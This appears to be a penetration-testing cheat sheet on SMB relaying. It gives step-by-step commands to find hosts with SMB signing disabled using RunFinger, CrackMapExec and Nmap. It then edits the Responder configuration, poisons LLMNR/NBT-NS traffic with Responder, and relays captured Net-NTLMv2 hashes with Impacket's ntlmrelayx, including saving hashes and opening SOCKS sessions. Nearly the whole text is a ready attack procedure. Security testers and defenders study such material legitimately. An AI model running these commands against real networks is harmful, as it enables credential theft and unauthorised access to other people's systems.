SMB Relaying

After observing LLMNR and/or NBT-NS traffic with Responder and forcing the client to authenticate to your machine, it is possible for the attacker to relay the Net-NTLMv2 hash obtained to all systems within scope that have SMB Signing Disabled.

Identifying Systems with SMB Signing Disabled

RunFinger.py

Finger is included with Responder.py in the /tools directory. Simply run the tool against either a subnet or file and parse the results using cut

python3 RunFinger.py -i $subnet

CrackMapExec

A list can also easily be created with CrackMapExec:

crackmapexec smb $subnet --gen-relay-list 

Nmap

Nmap can also create a list of hosts that have SMB Signing Disabled:

nmap --script=smb-security-mode -p445 $ip

SMB Relaying 101

After confirming LLMNR/NBT-NS traffic and identifying systems with SMB Signing Disabled, we are ready to perform the attack. First, we need modify the Responder.conf file and disable both SMB and HTTP:

# responder.conf

SQL = On
SMB = Off    
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off
HTTPS = On
DNS = On
LDAP = On

We can then run Responder:

responder -I eth0 -dwP

We can then run ntlmrelayx.py from Impacket, supplying our file of hosts previously identified to have SMB Signing Disabled.

# Example generic relaying
python3 ntlmrelayx.py -tf smbdisabled.out --smb2support

# Save hashes from relaying locally
python3 ntlmrelayx.py -tf smbdisabled.out --smb2support -of

Relaying with SOCKS

We can also enable SOCKS support while relaying for interactive sessions. Using this flag will also provide you with a session on the host if the user is not a local administrator:

python3 ntlmrelayx.py -tf smbdisabled.out --smb2support --socks

References

Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes) // byt3bl33d3r // /dev/random > blog.py

NTLM Relayhackndo

The Basics of SMB Signing (covering both SMB1 and SMB2)docsmsft

SMB Relaycheatsheet

Playing with Relayed CredentialsSecureAuth